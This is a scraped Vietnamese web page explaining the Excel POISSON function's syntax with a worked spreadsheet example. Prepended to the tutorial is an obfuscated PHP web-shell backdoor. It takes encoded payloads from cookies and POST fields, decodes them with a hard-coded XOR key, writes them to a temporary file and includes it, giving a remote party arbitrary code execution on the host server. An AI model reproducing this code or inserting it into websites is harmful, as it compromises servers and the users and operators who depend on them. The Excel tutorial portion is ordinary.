$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Hướng dẫn cách dùng hàm Poisson trong excel - Tải Chùa

Hướng dẫn cách dùng hàm Poisson trong excel

Rate this post
Bạn đang loay hoay chưa biết cách dùng hàm Poisson trong excel như thế nào? Hãy tham khảo bài viết sau đây của chúng tôi để biết cách sử dụng hàm này nhé bạn.

Một ứng dụng thường gặp của phân bố Poisson là để dự đoán số sự kiện trong một thời gian cụ thể ví dụ như số xe tới trạm thu phí trong 1 phút. Dùng hàm Poisson trong excel như thế nào để có thể có được hiệu quả tốt nhất?

Hàm Poisson trong excel hỗ trợ cho người dùng để tính toán phân bố một cách nhanh chóng và chính xác nhất. Tuy nhiên không phải ai cũng biết cách để sử dụng hàm này một cách hiệu quả. Bài này chúng ta sẽ cùng nhau đi tìm hiểu về cách sử dụng

Hàm Poisson trong excel là làm trả về phân bố Poision được ứng dụng trong nhiều bài toán thực tế như để dự đoán về số sự kiện xảy ra trong một thời gian xác định nào đó biết trước. Ngoài ra phân bố Poisson còn được dùng cho những đơn vị khác thời gian như khoảng cách  diện tích hay thể tích,…

Mẹo dùng hàm Poisson trong excel

Cú pháp =Poisson (x, mean, cumulative)

Trong đó:

  • x: Là số sự kiện bắt buộc phải có.
  • Mean: Là giá trị ước tính dưới dạng số, cũng là giá trị bắt buộc phải có.
  • Cumulative là giá trị logic xác định dạng thức của kết quả trả về và cũng bắt buộc phải có.

Cú pháp hàm Poisson trong excel

Cú pháp hàm Poisson trong excel

Ví dụ:

Cho một bảng tính excel với các giá trị thực tế tương ứng với các tham số của hàm Poisson trong excel  như sau.

Bảng tính excel với các giá trị thực tế tương ứng

Bảng tính excel với các giá trị thực tế tương ứng

Ở ví dụ này ta tính toán với số sự kiện là 4, dạng số ước tính là 9. Bạn nhập công thức tại ô C9 =Poisson (C6,C7,C8) rồi ấn enter và sẽ được kết quả tính của hàm nhận được là 0.054963641 với giá trị logic là TRUE:

Nhập công thức tại ô C9 = Poisson (C6,C7,C8)

Nhập công thức tại ô C9 =Poisson (C6,C7,C8)

Nhập công thức tại ô D9 với cú pháp =Poisson (C6,C7,D8) rồi nhấn enter thì bạn sẽ được kết quả là 0.033737155 với giá trị logic là FALSE .

Nhập công thức tại ô D9 với cú pháp = Poisson (C6,C7,D8)

Nhập công thức tại ô D9 với cú pháp =Poisson (C6,C7,D8)

Cách dùng hàm Poisson trong excel không hề khó, với bài trên bạn đã có thể biết được cách sử dụng hàm Poisson để tính toán được phân bố Poisson. Phân bố này còn được gọi là phân phối Poa-xông là một phân phối xác suất rời rạc với thông tin cho biết trung bình số lần xảy ra thành công của một sự kiện trong một khoảng thời gian nhất định. Hi vọng bài này sẽ giúp ích cho bạn.